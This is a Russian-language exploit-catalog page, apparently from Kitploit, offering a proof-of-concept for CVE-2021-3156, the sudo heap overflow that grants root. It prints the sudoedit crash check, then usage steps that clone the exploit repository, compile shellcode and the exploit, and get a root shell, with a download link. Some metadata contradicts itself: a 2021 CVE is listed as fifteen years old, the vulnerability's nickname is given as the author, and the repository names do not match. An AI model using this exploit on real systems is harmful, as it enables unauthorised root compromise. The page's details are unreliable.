Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-3156 — Эксплойт, подтверждающий концепцию для CVE-2021-3156, переполнение буфера в куче в sudo до версии 1.9.5p2, позволяющее повышение привилегий до root через sudoedit -s. | Kitploit
Инструменты/GitHubGitHub/sbladiamond/cve-2021-3156
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеЭксплуатация Бинарных Файлов
GitHubsbladiamond/cve-2021-3156

CVE-2021-3156

Эксплойт, подтверждающий концепцию для CVE-2021-3156, переполнение буфера в куче в sudo до версии 1.9.5p2, позволяющее повышение привилегий до root через sudoedit -s.

Репозиторий
15 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-3156

Sudo до версии 1.9.5p2 содержит ошибку off-by-one, которая может привести к переполнению буфера в куче, что позволяет повысить привилегии до root через sudoedit -s и аргумент командной строки, заканчивающийся одним символом обратной косой черты.

Автор: Консультация от Baron Samedit of Qualys

Как проверить, уязвимы ли вы.

Проект sudo выпустил команду, позволяющую проверить, уязвима ли ваша версия sudo:

root@kitploit:~
sudoedit -s '\' `perl -e 'print "A" x 65536'`

Если вы получили сообщение об использовании или ошибку, sudo не уязвим. Если результатом является Segmentation fault, sudo уязвим.

Использование

PoC получения root shell для CVE-2021-3156 (без перебора) Протестировано на Ubuntu 20.04 (sudo 1.8.31)

root@kitploit:~
$ git clone https://github.com/CyberCommands/CVE-2021-3156.git
$ cd CVE-2021-3156
$ make
mkdir libnss_x
cc -O3 -shared -nostdlib -o libnss_x/x.so.2 shellcode.c
cc -O3 -o exploit exploit.c
$ ./exploit
# whoami
root
Скачать инструмент